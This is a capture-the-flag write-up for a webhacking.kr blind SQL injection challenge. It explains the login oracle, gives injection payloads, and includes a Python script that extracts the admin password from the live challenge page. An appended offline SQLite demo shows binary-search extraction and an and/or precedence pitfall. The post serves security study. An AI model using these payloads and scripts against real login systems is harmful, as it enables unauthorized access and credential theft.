[webhacking.kr] old-23 blind SQL injection
Security/web, 2021. 8. 18. 16:01
https://webhacking.kr/challenge/bonus-1/index.php
Challenge 21
Problem analysis

id: admin, pw: admin => login fail
id: admin, pw: asdf => login fail
id: a, pw: a => login fail
id: guest, pw: guest => login success
id: guest, pw: a => login fail
id: a, pw: guest => login fail
id: guest, pw: 'or 1=1 => wrong password
So the responses form a boolean oracle: injected condition TRUE => "wrong password" (the row is selected but the submitted pw does not match), FALSE => "login fail" (no row selected).
Finding the ID
I assumed the id would be admin and only checked that its first character is "a".
id : admin' and ord(substr(id, 1, 1))=97 #
pw : a
=> wrong password
Probability that id = admin: 98%.
Finding the PW
I automated finding the pw with Python.
```python
import requests

url = "https://webhacking.kr/challenge/bonus-1/index.php"

# find pw_len: "wrong password" comes back only when the injected condition is true
pw_len = 1
while True:
    params = {'id': f"admin' and length(pw)={pw_len} #", 'pw': "1"}
    req = requests.get(url, params=params)
    if "wrong password" in req.text:
        print("password length is : " + str(pw_len))
        break
    print(pw_len)
    pw_len += 1

# find password one character at a time (ord() of each character, 0..127)
password = ""
for i in range(1, pw_len + 1):
    for c in range(0, 128):
        params = {'id': f"admin' and ord(substr(pw, {i}, 1))={c} #", 'pw': "a"}
        req = requests.get(url, params=params)
        if "wrong password" in req.text:
            password += chr(c)
            print("password: " + password)
            break
```

I got the precedence of the and and or operators confused, which cost some time. and comes first.
Suppose length(pw) is 10. Because AND binds tighter than OR, an `or` payload is evaluated as
select ~~~ where (id='admin' and pw='1') or length(pw)=10 # (x)
which is true for any row whose password is 10 characters long, not only admin's, so the answer says nothing about admin. Using `and` and commenting out the rest keeps the test bound to the admin row:
select ~~~ where id='admin' and length(pw)=10 #' and pw='1' (o, everything after # is commented out)
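The following is an added, offline example (not the post's own script and not the challenge's real code). It builds a constructed SQLite stand-in for the vulnerable login that reproduces the three responses observed above, and uses it to show two things: the extraction of the pw through the same "wrong password" oracle, but with a binary search on ord() instead of testing all 128 values per character, and the and/or precedence pitfall from the last paragraph, where the `or` form is satisfied by the guest row. The user table, the admin password and the query counter are assumptions for the demo. SQLite differences from the MySQL target: the line comment is `-- ` instead of `#`, and `unicode()` stands in for `ord()`.

```python
import sqlite3

# Constructed stand-in for the challenge's user table (example data, not the real challenge's).
USERS = [("admin", "s3cretpw!!"), ("guest", "guest")]

CON = sqlite3.connect(":memory:")
CON.execute("create table users(id text, pw text)")
CON.executemany("insert into users values(?, ?)", USERS)

QUERY_COUNT = 0  # stands in for the number of HTTP requests the real attack would send


def login(id_, pw):
    """Vulnerable login that reproduces the three responses seen in the challenge.
    The query is built by string concatenation, so both parameters are injectable.
    (SQLite line comments are '-- '; the MySQL target accepted '#'.)"""
    global QUERY_COUNT
    QUERY_COUNT += 1
    sql = f"select id, pw from users where id='{id_}' and pw='{pw}'"
    try:
        row = CON.execute(sql).fetchone()
    except sqlite3.Error:
        return "login fail"
    if row is None:
        return "login fail"       # condition false: no row came back
    if row[1] != pw:
        return "wrong password"   # a row came back, but its pw is not the one we sent
    return "login success"


def oracle(cond):
    """Boolean oracle: 'wrong password' <=> the injected condition is true for admin."""
    return login(f"admin' and ({cond}) -- ", "a") == "wrong password"


def find_length(hi=64):
    """Binary-search length(pw) instead of testing every length in turn (assumes pw <= hi chars)."""
    lo = 1
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"length(pw) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def find_char(pos):
    """Binary-search one character of pw: 7 queries instead of up to 128.
    unicode() is SQLite's equivalent of MySQL's ord(); assumes ASCII passwords."""
    lo, hi = 0, 127
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"unicode(substr(pw, {pos}, 1)) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)


def extract_password():
    """Returns (recovered password, number of queries used)."""
    global QUERY_COUNT
    QUERY_COUNT = 0
    n = find_length()
    pw = "".join(find_char(i) for i in range(1, n + 1))
    return pw, QUERY_COUNT


def precedence_demo():
    """Same test (is admin's pw 5 characters long?) injected with 'and' in id vs 'or' in pw.
    AND binds tighter than OR, so the 'or' form becomes
    (id='admin' and pw='1') or length(pw)=5, which the guest row satisfies."""
    with_and = login("admin' and length(pw)=5 -- ", "1")   # admin's pw is 10 chars: "login fail"
    with_or = login("admin", "1' or length(pw)=5 -- ")     # guest row matches: "wrong password"
    return with_and, with_or


if __name__ == "__main__":
    print(extract_password())   # -> ('s3cretpw!!', 76)
    print(precedence_demo())    # -> ('login fail', 'wrong password')
```

The `or` variant reports "true" for a condition that is false for admin, which is exactly the kind of false positive that makes a blind extraction produce garbage; anchoring the condition with `and` and commenting out the rest of the WHERE clause avoids it. The binary search cuts the cost from up to 128 requests per character to 7.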